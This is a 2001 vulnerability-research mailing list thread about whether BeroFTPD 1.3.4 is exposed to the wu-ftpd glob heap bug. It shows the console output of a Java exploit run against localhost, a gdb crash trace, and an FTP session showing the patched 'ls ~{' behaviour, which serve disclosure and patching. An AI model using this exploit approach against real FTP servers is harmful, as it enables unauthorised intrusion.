Re: Older BeroFTPD glob

From: Eduardo Cruz (eduardo.cruz@tsg.com)
Date: 12/10/01


From: "Eduardo Cruz" <eduardo.cruz@tsg.com>
To: "KF" <dotslash@snosoft.com>, <vuln-dev@security-focus.com>
Date: Mon, 10 Dec 2001 02:44:34 +0100

hi kf, yes by default of course it is.
And past and future "standard" wuftpd bugs will affect beroftpd.
for 1.3.4 just change the glob.c for the glob.c i attached on my last post.
And dont forget that there are a few back-time wuftpd bugs that are present
in bero. have fun :)

----- Original Message -----
From: "KF" <dotslash@snosoft.com>
To: <eduardo.cruz@tsg.com>; <vuln-dev@security-focus.com>
Sent: Friday, January 02, 1970 12:09 AM
Subject: re: Older BeroFTPD glob

> In eduardos reply I did not find it clear that BeroFTPD 1.3.4 was or was
> not vuln by default compile. I compiled it from the latest source on
> the wu-ftpd.org ftp server. Bare with no patches I get the following
> result... which was the same with earlier versions. Again I am on a ppc
> linux box:
>
> [root@ibook root]# java wuwarez 42424242 0 localhost anonymous
> Shellcode is 44 bytes long
> return is 42424242
> Got Socket
> Sleeping so that you can attach a debugger
> 220 ibook FTP server (BeroFTPD 1.3.4(2) Mon Dec 1 23:09:32 EST 2003)
ready.
> Sending username
> 331 Guest login ok, send your complete e-mail address as password.
> sending mal buffer as the passwd
> ;230 Guest login ok, access restrictions apply.
> Populate Heap...needs more work
> (program exit)
> [root@ibook root]#
>
> (This is what we saw when we attached the debugger)
>
> [root@ibook src]# ps -ef | grep ftpd
> ftp 2035 790 0 14:55 ? 00:00:00 ftpd:
> localhost.localdomain: anonymous
> [root@ibook src]# gdb ./ftpd 2035
> Program received signal SIGSEGV, Segmentation fault.
> 0xfeb6cfc in free () from /lib/libc.so.6
> (gdb) bt
> #0 0xfeb6cfc in free () from /lib/libc.so.6
> #1 0x10010b58 in blkfree (av0=0x42424242) at glob.c:604
> #2 0x1000dd04 in yyparse () at ftpcmd.y:1246
> #3 0x10002cac in main (argc=268566528, argv=0x7ffffc74,
> envp=0x1003e828) at ftpd.c:1221
> #4 0xfe5e308 in __libc_start_main () from /lib/libc.so.6
>
> Detaching from program: /root/BeroFTPD-1.3.4/src/./ftpd, Pid 2035
>
> -KF
>
>
> From: "Eduardo Cruz" <eduardo.cruz@tsg.com> <mailto:eduardo.cruz@tsg.com>
> Date: Sun Dec 09, 2001 05:00:10 AM US/Pacific
> To: "KF" <dotslash@snosoft.com> <mailto:dotslash@snosoft.com>,
> <vuln-dev@security-focus.com> <mailto:vuln-dev@security-focus.com>
> Subject: Re: Older BeroFTPD glob
>
> Connected to localhost.
> 220 cimitarra FTP server (BeroFTPD 1.3.4(1) Wed May 30 18:22:32 CEST 2001)
> ready.
> Name (localhost:root): anonymous
> 331 Guest login ok, send your complete e-mail address as password.
> Password:
> 230-Welcome, archive user! This is an experimental FTP server. If have
> any
> 230-unusual problems, please report them via e-mail to root@cimitarra
> <mailto:root@cimitarra>
> 230-If you do have problems, please try using a dash (-) as the first
> character
> 230-of your password -- this will turn off the continuation messages that
> may
> 230-be confusing your ftp client.
> 230-
> 230 Guest login ok, access restrictions apply.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls ~{
> 200 PORT command successful.
> 550 Missing }
> ftp>
>
> just patch glob.c ur self, or use the mine already patched (attached).
> And about the maintenance of beroftp, as far as i know is not being done
> since years ago.
> Anyway appart from the bugs derivating from vuftpd i dont see the point on
> maintaining bero, i find it quite perfect like it is.
>
> have fun
>